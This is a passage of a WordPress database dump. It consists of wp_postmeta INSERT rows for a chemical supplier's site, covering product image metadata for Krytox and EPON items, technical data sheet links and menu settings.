:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18421, 1961, '_wp_attached_file', '2016/09/EPON-modified-epoxy.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18422, 1961, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3648;s:6:"height";i:5472;s:4:"file";s:31:"2016/09/EPON-modified-epoxy.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-533x800.jpg";s:5:"width";i:533;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"EPON-modified-epoxy-768x1152.jpg";s:5:"width";i:768;s:6:"height";i:1152;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPON-modified-epoxy-1067x1600.jpg";s:5:"width";i:1067;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18423, 1962, '_wp_attached_file', '2016/09/Epon-unmodified-epoxy.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18424, 1962, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:33:"2016/09/Epon-unmodified-epoxy.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18425, 1963, '_wp_attached_file', '2016/08/krytox-fpg-128-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18426, 1963, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2222;s:6:"height";i:1666;s:4:"file";s:28:"2016/08/krytox-fpg-128-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-128-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"krytox-fpg-128-2-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"krytox-fpg-128-2-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-fpg-128-2-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-128-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-128-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"krytox-fpg-128-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"krytox-fpg-128-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18427, 1964, '_wp_attached_file', '2016/09/Epon-unmodified-epoxy-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18428, 1964, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:35:"2016/09/Epon-unmodified-epoxy-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"Epon-unmodified-epoxy-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18429, 1965, '_wp_attached_file', '2016/08/krytox-fpg-028-4-e1474477915984.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18430, 1965, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4118;s:6:"height";i:3844;s:4:"file";s:43:"2016/08/krytox-fpg-028-4-e1474477915984.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"krytox-fpg-028-4-e1474477915984-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"krytox-fpg-028-4-e1474477915984-800x747.jpg";s:5:"width";i:800;s:6:"height";i:747;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"krytox-fpg-028-4-e1474477915984-768x717.jpg";s:5:"width";i:768;s:6:"height";i:717;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:45:"krytox-fpg-028-4-e1474477915984-1600x1494.jpg";s:5:"width";i:1600;s:6:"height";i:1494;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"krytox-fpg-028-4-e1474477915984-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"krytox-fpg-028-4-e1474477915984-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"krytox-fpg-028-4-e1474477915984-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"krytox-fpg-028-4-e1474477915984-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18431, 1965, '_wp_attachment_backup_sizes', 'a:9:{s:9:"full-orig";a:3:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:20:"krytox-fpg-028-4.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-4-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-4-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-4-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:10:"large-orig";a:4:{s:4:"file";s:30:"krytox-fpg-028-4-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-4-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-4-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-4-225x360.jpg";s:5:"width";i:225;s:6:"height";i:360;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-4-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (18432, 1966, '_wp_attached_file', '2016/09/EPON-blended-EPOXY.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18433, 1966, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2832;s:6:"height";i:4256;s:4:"file";s:30:"2016/09/EPON-blended-EPOXY.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-532x800.jpg";s:5:"width";i:532;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPON-blended-EPOXY-768x1154.jpg";s:5:"width";i:768;s:6:"height";i:1154;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"EPON-blended-EPOXY-1065x1600.jpg";s:5:"width";i:1065;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18434, 1967, '_wp_attached_file', '2016/08/krytox-ts4-thread-sealant-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18435, 1967, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3504;s:6:"height";i:2336;s:4:"file";s:39:"2016/08/krytox-ts4-thread-sealant-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-ts4-thread-sealant-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18436, 1968, '_wp_attached_file', '2016/08/gearbox-grease-krytox-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18437, 1968, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4163;s:6:"height";i:2770;s:4:"file";s:35:"2016/08/gearbox-grease-krytox-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"gearbox-grease-krytox-1-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18438, 1969, '_wp_attached_file', '2016/09/krytox-pca-oil-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18439, 1969, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:28:"2016/09/krytox-pca-oil-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"krytox-pca-oil-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"krytox-pca-oil-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"krytox-pca-oil-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-pca-oil-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"krytox-pca-oil-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"krytox-pca-oil-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"krytox-pca-oil-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"krytox-pca-oil-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18444, 1972, '_wp_attached_file', '2016/09/updraftplus-with-migrator.2.12.20.zip'); 
INSERT INTO `wp_postmeta` VALUES (18445, 1972, '_wp_attachment_context', 'upgrader'); 
INSERT INTO `wp_postmeta` VALUES (18459, 1976, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (18460, 1976, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (18461, 1976, '_menu_item_object_id', '1842'); 
INSERT INTO `wp_postmeta` VALUES (18462, 1976, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (18463, 1976, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (18464, 1976, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (18465, 1976, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (18466, 1976, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (18472, 1842, 'U_S_C_message', '<BR><BR><H3>\r\nTechnical SDS documents are only available to qualified accounts. </h3><BR><BR>1. Please  REGISTER (if you have not done so already) an account by clicking this button: <a href="https://www.miller-stephenson.com/my-account/" class="button primary">REGISTER</a>\r\n<BR>'); 
INSERT INTO `wp_postmeta` VALUES (18473, 1268, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18474, 1276, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18536, 1842, '_aioseop_noindex', 'on'); 
INSERT INTO `wp_postmeta` VALUES (18537, 1842, '_aioseop_nofollow', 'on'); 
INSERT INTO `wp_postmeta` VALUES (18538, 1842, '_aioseop_noodp', 'on'); 
INSERT INTO `wp_postmeta` VALUES (18539, 1842, '_aioseop_noydir', 'on'); 
INSERT INTO `wp_postmeta` VALUES (18540, 1982, '_wp_attached_file', '2016/09/TDS-122AD-new-format.pdf'); 
INSERT INTO `wp_postmeta` VALUES (18541, 1677, '318_custom_list_file', 'a:1:{s:32:"d081667a3aacd71a61f5be3edd9c439c";a:3:{s:4:"name";s:8:"MS-122AD";s:4:"file";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/TDS-122AD-new-format.pdf";s:4:"desc";s:12:"MS-122AD TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (18542, 1983, '_wp_attached_file', '2016/09/TDS-122XD-new-format.pdf'); 
INSERT INTO `wp_postmeta` VALUES (18543, 1681, '318_custom_list_file', 'a:1:{s:32:"96eb4ccfe56aba23455fc7baf19a5e44";a:3:{s:4:"name";s:8:"MS-122XD";s:4:"file";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/TDS-122XD-new-format.pdf";s:4:"desc";s:12:"MS-122XD TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (18544, 1984, '_wp_attached_file', '2016/09/EPIKURE-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18545, 1984, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/09/EPIKURE-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPIKURE-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPIKURE-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPIKURE-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPIKURE-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPIKURE-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18546, 1209, '_thumbnail_id', '1984'); 
INSERT INTO `wp_postmeta` VALUES (18547, 1209, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18548, 1985, '_wp_attached_file', '2016/09/EPIKURE-2.jpg'); 
